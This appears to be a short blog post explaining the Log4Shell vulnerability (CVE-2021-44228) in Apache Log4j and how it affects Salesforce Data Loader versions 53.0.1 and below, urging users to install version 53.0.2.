Salesforce Data Loader Log4j Vulnerability

Log4j, which is Apache’s Java-based logging utility, was found that it has a security vulnerability. This vulnerability is officially known as CVE 2021-44228, or informally it is known as Log4Shell or LogJam. Log4Shell is a Remote Code Execution (RCE) class vulnerability which allows hackers to input arbitrary code into an application. Even amateur hackers can perform this type of violation. By doing this, hackers can put their own code by adding a single string to the log, which gives them full control over the server.

Severity of Log4Shell

Common Vulnerability Scoring System (CVSS) is a system that rates software vulnerabilities according to their characteristics and severity. Rating scale of CVSS is from 1 to 10. You can read more about CVSS from this link.

Just to understand the severity of Log4Shell, the SolarWinds hack cost the company approximately $18 million in the first few months of 2021. This hack was rated a 9 on the CVSS scale.

Log4Shell was rated 10 on the CVSS scale!

Data Loader and Log4Shell

Data Loader is a tool to export, import, update, upsert, or delete data in Salesforce. Many users with correct permissions use this tool on a daily basis. However, Salesforce Data Loader utilizes Apache Log4j, which makes it vulnerable to Log4Shell.

Versions of Data Loader (53.0.1 and below) that were downloaded and installed by users before December 20, 2021, may be affected by the Apache Log4j vulnerabilities. However, Salesforce took an action to protect from this issue and introduced an updated version of Data Loader. This new version is currently available in Setup. Users can download and install it from Setup.

Data Loader 53.0.2 Direct Download link (Win/Mac):

Even if your org has not been affected by this vulnerability, instruct all users of Data Loader to download and install the new version.

Keep your orgs safe!

Data Loader V53.0.2 - Log4j Vulnerability

Click here to read more news about Salesforce.

Be the first to comment

Leave a Reply

Your email address will not be published.